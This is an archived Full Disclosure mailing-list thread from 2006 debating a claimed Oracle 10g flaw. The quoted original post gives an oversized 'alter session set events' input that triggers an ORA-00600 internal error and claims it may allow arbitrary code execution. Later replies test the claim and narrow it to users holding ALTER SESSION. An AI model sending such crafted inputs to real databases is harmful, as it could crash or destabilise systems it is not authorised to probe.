Full Disclosure mailing list archives
Re: Oracle 10g R2 and, probably, all previous versions
From: Russell Lowenthal <perpetualv () yahoo com>
Date: Fri, 28 Jul 2006 13:13:53 -0700 (PDT)
Doh! Busted right back! Now I get the same results (assuming I grant the user alter session of course - if the user doesn't have alter session I get the privilege error). Thanks Raj! --- rjamya <rjamya () gmail com> wrote:
Russell, you have a syntax error, you need a comma before LEVEL. Raj On 7/28/06, Russell Lowenthal <perpetualv () yahoo com> wrote:Interesting comment. So if I understand what youaresaying I should be able to create a user: SQL> create user nottoosmart identified by d0ntkn0wmuch; User created. SQL> grant create session to nottoosmart; Grant succeeded. SQL> connect nottoosmart/d0ntkn0wmuch Connected. SQL> alter session set events '10046 trace name context forever level 16'; ERROR: ORA-01031: insufficient privileges Hmm - would you mind posting your EXACT test case?Iran this against a 9.2.0.7, 10.2.0.1 and 10.2.0.2 database and seem to get different results thenyouare seeing. Just for the heck of it I went aheadandgranted the user alter session privileges: SQL> conn / as sysdba Connected. SQL> grant alter session to nottoosmart; Grant succeeded. SQL> connect nottoosmart/d0ntkn0wmuch Connected. SQL> alter session set events '10046 trace name context forever level 16'; ERROR: ORA-02194: event specification syntax error 230(minorerror 215) near 'LEVEL' so even a user that I've purposely givenprivileges toalter their own session doesn't seem to be able todoanything with this command. So far I have to call this myth: Busted ---Original message---- I can't believe it. Oracle releases new patchesandthey have not been solved one of the mainproblems: Auser with only the SELECT privilege can doWHATEVER(S)HE WANTS WITH THE ENTIRE DATABASE!!!! I'm not sure if is time to full disclosure it but, anyway, I will "full disclosure" one inocentissue, aninteger overflow: Example: --Connect with any user with only CREATE SESSION SQL> alter session set events '10046 trace name context forever, level SQL> 16'; Session altered. SQL> alter session set events
'10046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004
61004610046100461004610046100461004610046100461004610046100461004610046100461004610046trace
name context forever, level 16'; ERROR: ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [], [] It's not even a crash but (be sure) that there are other "combinations" that makes it vulnerable to integer overflows allowing the execution ofarbritrarycode. PD: Hello Mary Ann! Are you on holidays?
_________________________________________________________________
Grandes éxitos, superhéroes, imitaciones, cine yTV...http://es.msn.kiwee.com/ Lo mejor para tu móvil. __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spamprotection aroundhttp://mail.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia -http://secunia.com/-- ---------------------------------------------- Got RAC?
__________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Oracle 10g R2 and, probably, all previous versions putosoft softputo (Jul 27)
- chaseonline security Geo. (Jul 28)
- <Possible follow-ups>
- Oracle 10g R2 and, probably, all previous versions Russell Lowenthal (Jul 28)
- Re: Oracle 10g R2 and, probably, all previous versions rjamya (Jul 28)
- Re: Oracle 10g R2 and, probably, all previous versions Russell Lowenthal (Jul 28)
- Re: Oracle 10g R2 and, probably, all previous versions rjamya (Jul 28)